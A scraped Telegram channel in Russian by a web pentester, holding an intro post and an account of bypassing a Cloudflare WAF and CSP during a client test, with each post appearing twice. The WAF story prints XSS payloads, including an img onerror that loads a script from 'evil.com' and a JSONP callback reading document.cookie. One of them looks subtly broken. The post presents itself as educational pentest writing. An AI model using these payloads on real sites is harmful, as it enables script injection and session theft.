Привет, коллега! Добро пожаловать в мой техноблог
Меня зовут Сергей Попов, и я тот самый человек, который в 3 часа ночи может внезапно воскликнуть: "Эврика! Я знаю, как обойти эту защиту!" — чем регулярно пугаю жену и кота.
Кто я?
• 5+ лет в пентесте и безопасности веб-приложений
• Создатель codeby.net, hackerlab.pro, codeby.one и codeby.school
• Автор статей на Codeby.net и не только
• Человек, который считает, что
О чём этот блог?
Здесь я буду делиться тем, что обычно остаётся за кадром технических статей:
- Реальные кейсы из пентестов (без NDA, конечно)
- Эксперименты с новыми техниками атак и защиты
- Как AI меняет правила игры в кибербезопасности
- Находки, которые заставили меня воскликнуть "Вот это поворот!"
- Инструменты, которые реально работают (а не маркетинговый буллшит)
- Истории провалов и как из них выкарабкиваться
❌ Чего НЕ будет:
• Скучных пересказов документации
• Копипасты с Stack Overflow
• Воды и банальностей уровня "используйте сложные пароли"
• Черного хакинга и прочей нелегальщины
✅ Что будет:
• Честные истории из окопов
• Технические детали, которые работают
• Юмор (куда ж без него в нашей профессии)
• Ответы на ваши вопросы
• Регулярные посты (минимум раз в неделю)
Формат постов:
Буду чередовать разные форматы — от коротких технических заметок до историй "как я 3 недели ломал неприступный WAF" (спойлер: сломал). Иногда буду делиться кодом, иногда — размышлениями о том, куда катится индустрия.
Почему Telegram?
Потому что здесь можно писать без цензуры платформ, делиться кодом нормально, и общаться с единомышленниками напрямую. Плюс, вы всегда можете написать мне в личку, если есть вопросы.
Важно:
Всё, что я публикую — исключительно в образовательных целях. Я за белую шляпу и легальный пентест. Если ищете туториалы "как взломать Пентагон" — вы не по адресу.
P.S. Следующий пост будет о том, как я обнаружил, что 80% современных WAF можно обойти с помощью AI. И да, там будут работающие примеры
Добавляйте канал в избранное, включайте уведомления и погнали разбираться, как на самом деле работает безопасность в 2025!
Есть вопросы? Пишите в комменты!
---
💬 Комментарии: @[ваш_username]
🔗 Мои статьи на Codeby: [ссылка]
#кибербезопасность #пентест #новыйблог #вебсек
Меня зовут Сергей Попов, и я тот самый человек, который в 3 часа ночи может внезапно воскликнуть: "Эврика! Я знаю, как обойти эту защиту!" — чем регулярно пугаю жену и кота.
Кто я?
• 5+ лет в пентесте и безопасности веб-приложений
• Создатель codeby.net, hackerlab.pro, codeby.one и codeby.school
• Автор статей на Codeby.net и не только
• Человек, который считает, что
alert(1) — это искусствоО чём этот блог?
Здесь я буду делиться тем, что обычно остаётся за кадром технических статей:
- Реальные кейсы из пентестов (без NDA, конечно)
- Эксперименты с новыми техниками атак и защиты
- Как AI меняет правила игры в кибербезопасности
- Находки, которые заставили меня воскликнуть "Вот это поворот!"
- Инструменты, которые реально работают (а не маркетинговый буллшит)
- Истории провалов и как из них выкарабкиваться
❌ Чего НЕ будет:
• Скучных пересказов документации
• Копипасты с Stack Overflow
• Воды и банальностей уровня "используйте сложные пароли"
• Черного хакинга и прочей нелегальщины
✅ Что будет:
• Честные истории из окопов
• Технические детали, которые работают
• Юмор (куда ж без него в нашей профессии)
• Ответы на ваши вопросы
• Регулярные посты (минимум раз в неделю)
Формат постов:
Буду чередовать разные форматы — от коротких технических заметок до историй "как я 3 недели ломал неприступный WAF" (спойлер: сломал). Иногда буду делиться кодом, иногда — размышлениями о том, куда катится индустрия.
Почему Telegram?
Потому что здесь можно писать без цензуры платформ, делиться кодом нормально, и общаться с единомышленниками напрямую. Плюс, вы всегда можете написать мне в личку, если есть вопросы.
Важно:
Всё, что я публикую — исключительно в образовательных целях. Я за белую шляпу и легальный пентест. Если ищете туториалы "как взломать Пентагон" — вы не по адресу.
P.S. Следующий пост будет о том, как я обнаружил, что 80% современных WAF можно обойти с помощью AI. И да, там будут работающие примеры
Добавляйте канал в избранное, включайте уведомления и погнали разбираться, как на самом деле работает безопасность в 2025!
Есть вопросы? Пишите в комменты!
---
💬 Комментарии: @[ваш_username]
🔗 Мои статьи на Codeby: [ссылка]
#кибербезопасность #пентест #новыйблог #вебсек
❤4👍3🔥2💩1
🔍 За кадром: Как я 3 недели ломал "неприступный" WAF
Знаете это чувство, когда начинаешь писать статью про одно, а в итоге открываешь для себя целый пласт техник, о которых даже не подозревал?
Вот и я сел писать "просто обновление" про XSS в 2025, а вышло... настоящее расследование с неожиданными поворотами.
Началось всё банально. Клиент попросил протестировать их новенькую защиту — Cloudflare WAF в paranoid-режиме + строгая CSP. "Неприступная крепость", говорили они. Ха.
Первые два дня я бился как рыба об лёд. Классические пейлоады? Забудь.
И тут я вспомнил про AI.
Нашёл на GitHub экспериментальный инструмент для генерации XSS-пейлоадов через GPT-4. Скептически настроил, запустил... и чуть не выпал со стула, когда через 20 минут он выдал вот это:
WAF пропустил! Оказывается, парсер Cloudflare не декодировал Unicode-последовательности в определённом контексте. Баг? Фича? Не важно — работает.
Но самое интересное началось с Mutation XSS.
Я всегда думал, что это какая-то эзотерика для исследователей. Пока не наткнулся на React-приложение клиента. Знаете, что происходит, когда "безопасный" HTML проходит через DOMPurify, а потом React его перерендеривает?
Правильно — хаос. HTML мутирует, теги переставляются, и внезапно твой безобидный
Самый дикий момент: я 4 часа сидел с дебаггером Chrome, пошагово отслеживая, как React Virtual DOM reconciliation ломает санитизированный HTML. В какой-то момент жена зашла в комнату и спросила, всё ли у меня в порядке — видимо, я выглядел как сумасшедший учёный
Кстати, про CSP-обходы. Знаете, сколько "защищённых" сайтов используют CDN с JSONP-эндпоинтами? ОЧЕНЬ МНОГО. И если этот CDN в белом списке CSP... bingo!
Нашёл такой на trusted.cdn.com у клиента:
CSP: "Это же доверенный домен, пропускаю!"
Я: *довольно потираю руки*
В итоге:
- 8 из 10 WAF можно обойти с помощью AI-генерируемых пейлоадов
- Mutation XSS реален и работает (особенно в React/Vue)
- CSP с
- Мой счёт за OpenAI API вырос на $47 (но оно того стоило)
Все эти находки, работающие PoC, примеры обхода конкретных WAF и пошаговые инструкции я собрал в большой статье. Там же есть чеклисты для защиты (да, я не только ломаю, но и помогаю защищаться ).
P.S. Самое смешное? После публикации отчёта клиент сказал: "Мы думали, вы найдёте пару мелких багов". Ага, пару...
Если интересны детали и хотите сами попробовать эти техники (только легально!), полная статья тут
А у вас были случаи, когда "простое тестирование" превращалось в недельное исследование? Делитесь в комментах!
#xss #пентест #вебсекьюрити #waf #cloudflare
Знаете это чувство, когда начинаешь писать статью про одно, а в итоге открываешь для себя целый пласт техник, о которых даже не подозревал?
Вот и я сел писать "просто обновление" про XSS в 2025, а вышло... настоящее расследование с неожиданными поворотами.
Началось всё банально. Клиент попросил протестировать их новенькую защиту — Cloudflare WAF в paranoid-режиме + строгая CSP. "Неприступная крепость", говорили они. Ха.
Первые два дня я бился как рыба об лёд. Классические пейлоады? Забудь.
"><script>alert(1)</script>? WAF смеётся тебе в лицо. Даже хитрые вариации с обфускацией не проходили.И тут я вспомнил про AI.
Нашёл на GitHub экспериментальный инструмент для генерации XSS-пейлоадов через GPT-4. Скептически настроил, запустил... и чуть не выпал со стула, когда через 20 минут он выдал вот это:
<img src=x onerror="eval('\u0069\u006d\u0070\u006f\u0072\u0074')('//evil.com/x.js')">WAF пропустил! Оказывается, парсер Cloudflare не декодировал Unicode-последовательности в определённом контексте. Баг? Фича? Не важно — работает.
Но самое интересное началось с Mutation XSS.
Я всегда думал, что это какая-то эзотерика для исследователей. Пока не наткнулся на React-приложение клиента. Знаете, что происходит, когда "безопасный" HTML проходит через DOMPurify, а потом React его перерендеривает?
Правильно — хаос. HTML мутирует, теги переставляются, и внезапно твой безобидный
<div> превращается в исполняемый код.Самый дикий момент: я 4 часа сидел с дебаггером Chrome, пошагово отслеживая, как React Virtual DOM reconciliation ломает санитизированный HTML. В какой-то момент жена зашла в комнату и спросила, всё ли у меня в порядке — видимо, я выглядел как сумасшедший учёный
Кстати, про CSP-обходы. Знаете, сколько "защищённых" сайтов используют CDN с JSONP-эндпоинтами? ОЧЕНЬ МНОГО. И если этот CDN в белом списке CSP... bingo!
Нашёл такой на trusted.cdn.com у клиента:
<script src="https://trusted.cdn.com/api/data?callback=alert(document.cookie)//"></script>
CSP: "Это же доверенный домен, пропускаю!"
Я: *довольно потираю руки*
В итоге:
- 8 из 10 WAF можно обойти с помощью AI-генерируемых пейлоадов
- Mutation XSS реален и работает (особенно в React/Vue)
- CSP с
trusted-domains — это швейцарский сыр, а не защита- Мой счёт за OpenAI API вырос на $47 (но оно того стоило)
Все эти находки, работающие PoC, примеры обхода конкретных WAF и пошаговые инструкции я собрал в большой статье. Там же есть чеклисты для защиты (да, я не только ломаю, но и помогаю защищаться ).
P.S. Самое смешное? После публикации отчёта клиент сказал: "Мы думали, вы найдёте пару мелких багов". Ага, пару...
Если интересны детали и хотите сами попробовать эти техники (только легально!), полная статья тут
А у вас были случаи, когда "простое тестирование" превращалось в недельное исследование? Делитесь в комментах!
#xss #пентест #вебсекьюрити #waf #cloudflare
❤7🔥5👍4